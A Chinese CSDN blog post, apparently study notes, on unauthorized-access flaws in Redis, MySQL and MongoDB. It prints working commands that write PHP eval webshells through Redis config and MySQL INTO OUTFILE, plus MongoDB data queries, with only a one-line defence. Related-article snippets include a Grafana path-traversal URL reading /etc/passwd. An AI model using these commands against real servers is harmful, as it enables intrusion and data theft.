7、未授权访问漏洞

最新推荐文章于 2024-03-29 18:23:58 发布
最新推荐文章于 2024-03-29 18:23:58 发布
阅读量390 收藏 7
点赞数 8
分类专栏: Web漏洞(后端) 文章标签: 网络安全 安全 笔记 经验分享 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74152774/article/details/135461774
版权

1、概述

服务或应用未授权或者鉴权失效导致被恶意攻击,广义上来讲,鉴权绕过也属于未授权访问。

  • 分类:Web通用漏洞
  • 风险等级及危害:
    1. 严重:可完全控制服务器、执行系统命令。
    2. 高危:可获取数据库大量敏感信息或对系统进行控制。
    3. 低危:可登录系统,但无法通过当前权限的操作造成实际危害。

有以下几种:

  1. Redis未授权访问漏洞
  2. Mysql未授权访问漏洞
  3. MongoDB未授权访问漏洞
  4. 。。。

2、漏洞利用

2.1、Redis未授权访问漏洞

开放端口:6379

利用方法:写文件Getshell、获取数据

config get dir #查看redis数据库路径
config set dir /root/redis-2.8.17# #修改靶机Redis数据库路径
config set dbfilename shell.php #生成shell.php文件
set xxx "\r\n\r\n<?php phpinfo();?>\r\n\r\n"#将一句话木马写入文件中
#"\r\n\r\n"是换行的意思,用redis写入文件会自带一些版本信息,如果不换行可能导致无法执行。
set xxx "\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n"#上传木马可以通过蚁剑连接
save

2.2、Mysql未授权访问漏洞

开放端口:3306

利用方法:爆破弱口令、写文件、远程连接获取数据

select'<?php @eval($_POST[1])?>'into outfile '/data/www/1.php'

2.3、MongoDB未授权访问漏洞

开放端口:27017

利用方法:远程连接获取数据

Show dbs //查询所有数据库
Use websec //选择数据库,没有就创建
db.websec.insert({"name":"websec is ez"}) //插入数据
db.websec.find().pretty() //查询所有数据

3、漏洞挖掘

对这几个常用端口进行测试

4、漏洞防御

开启身份验证

DarkByte-
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最新2018年7月WebLogic漏洞(CVE-2018-2893) 适用于weblogic12.2.1.3
07-23
Oracle的高危远程代码执行漏洞(CVE-2018-2893),通过该漏洞攻击者可以在授权的情况下远程执行任意代码。 受此漏洞影响的版本包括: WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.2 WebLogic 12.2.1.3 解决方案: 1.控制T3协议的访问 2.升级到 jdk-8u20以上的版本 3.升级补丁
整理asp漏洞与入侵方式.doc
01-15
0x70授权访问的后台文件 7 0x80 万能密码与登陆框注入 7 0x81 万能密码 7 0x82 登陆框注入 7 0x90 注入攻击 7 0xA0后台功能利用 8 0xA1 配置文件插马 8 0xA2 数据库备份 8 0xA3 后台中的上传页面 8 0xA4目录遍历...
授权访问漏洞总结
LuckySec
03-24 4572
前言:这篇文章主要收集一些常见的授权访问漏洞授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 授权漏洞预览 Active MQ 授权访问 Atlassian Crowd 授权访问 CouchDB 授权访问 Docker 授权访问 Dubbo 授权访问 Druid 授权访问 Elasticsearch 授权访问 FTP 授权访问 Hadoop 授权访问 JBoss 授权访
Nginx漏洞授权访问和源码泄漏漏洞处理
最新发布
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
03-29 1129
Apereo CAS开箱即用,并且提供多种协议支持,如:CAS(v1,v2和v3)、SAML(1.0和2.0)、OAuth(v2)、OpenID、OpenID Connect等,Apereo CAS支持使用多种身份证方法,包括:JAAS、LDAP、RDBMS、Radius、JWT等。Keycloak是一个免费、开源身份认证和访问管理系统,支持高度可配置的单点登录(SSO)功能,旨在为现代的应用程序和服务,提供包含身份管理和访问管理功能的单点登录工具。完成后,配置要单点的应用程序。2>配置keycloak。
授权访问漏洞
weixin_56378389的博客
04-11 992
Redis;Docker
漏洞复现 - - - 授权访问漏洞Redis
weixin_67503304的博客
08-13 4572
授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
Web漏洞-授权访问漏洞
Ays.Ie的博客
03-21 3349
该篇记录了web漏洞-授权访问漏洞的相关知识
常见授权访问漏洞总结
mingyqf的博客
01-18 3400
常见授权访问漏洞总结 https://xz.aliyun.com/t/6103#toc-12 小维 / 2019-08-28 09:10:00 / 浏览数 46708 安全技术 众测渗透[顶(13)](javascript:) [踩(0)](javascript:) 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 常见的授权访问漏洞: Redis 授权访问漏洞 MongoDB 授权访问漏洞 Jenkins 授权访问漏洞 Memcached 授权访问漏洞 JBOSS
2023-0Day(漏洞检测Tools)V1.4 HW-漏洞挖掘-src
08-23
6、泛微EOffice授权访问漏洞 7、泛微EOfficeSQL注入漏洞 8、绿盟SAS堡垒机任意用户登录漏洞 2023/8/11,V1.2更新漏洞利用如下: 9、大华智慧园区综合管理平台emap文件上传 10、大华智慧园区综合管理平台SQL...
2023-0Day(漏洞检测Tools)HW-漏洞挖掘-src
08-23
6、泛微EOffice授权访问漏洞 7、泛微EOfficeSQL注入漏洞 8、绿盟SAS堡垒机任意用户登录漏洞 2023/8/11,V1.2更新漏洞利用如下: 9、大华智慧园区综合管理平台emap文件上传 10、大华智慧园区综合管理平台SQL...
蓝队利器、溯源反制、NPS 漏洞利用、NPS exp、NPS poc、Burp插件、一键利用
08-02
蓝队利器、溯源反制、NPS 漏洞利用、NPS exp、NPS poc、Burp插件、一键利用
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 3058
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。
常见授权访问漏洞详解
m0_55854679的博客
05-15 2989
参考文章1:二十八种授权访问漏洞合集 参考文章2:28种授权访问漏洞 简介 授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 常见的授权访问漏洞 MongoDB 授权访问漏洞 漏洞信息 开启MongoDB服务时不添加任何参数,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作【增、删、改、查高危动作】而且可以远程访问数据库。 造成授权访问的根本原因就在于启动 Mongodb
Grafana 授权任意文件读取漏洞复现
渗透测试研究中心
12-16 5173
1.fofa 批量搜索 app="Grafana" 漏洞URL: {{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd 2.获取远程目标linux系统的/etc/passwd密码信息 /public/plugins/alertGroups/../../../../../../../../etc/passwd/public/plugin
授权访问漏洞原理以及修复方法
it知识分享 free for nothing..
12-20 2679
授权访问漏洞 原理以及修复方法
授权访问漏洞汇总
weixin_46137328的博客
09-23 7385
本文共11695个字,可以先收藏后看。漏洞概览: Elasticsearch授权访问漏洞 Hadoop授权访问漏洞 Jenkins授权访问 MongoDB授权访问 Zoo...
nacos授权访问漏洞 修复
07-15
对于Nacos的授权访问漏洞,建议你采取以下措施进行修复: 1. 更新到最新版本:确保你使用的Nacos版本是最新的,因为最新版本通常包含了安全修复和漏洞修复。 2. 配置访问控制:通过配置适当的访问控制策略,限制只有授权的用户或者IP可以访问Nacos。可以使用Nacos的权限管理功能来实现。 3. 强化认证和授权:启用强密码策略,使用复杂的密码,并定期更换密码。确保只有授权用户具有适当的权限来访问和管理Nacos。 4. 防火墙设置:配置防火墙来限制对Nacos的访问,只允许来自可信源IP地址的请求。 5. 安全审计日志:启用安全审计日志功能,记录所有关键操作和访问日志。这有助于发现异常行为和及时应对潜在的安全威胁。 6. 定期备份:定期备份Nacos的数据,以防止数据丢失或损坏。备份可以帮助你在遭受攻击或数据丢失时快速恢复。 7. 安全漏洞扫描和测试:与安全团队合作,进行定期的安全漏洞扫描和安全测试,以发现并修复潜在的安全问题。 8. 及时响应:如果你发现任何安全问题或漏洞,应立即采取措施进行修复和调查。可以向Nacos官方团队报告漏洞,并升级到已修复漏洞的版本。 请记住,安全是一个持续的过程,需要不断地关注和改进。通过以上措施,你可以提高Nacos的安全性,并减少授权访问漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值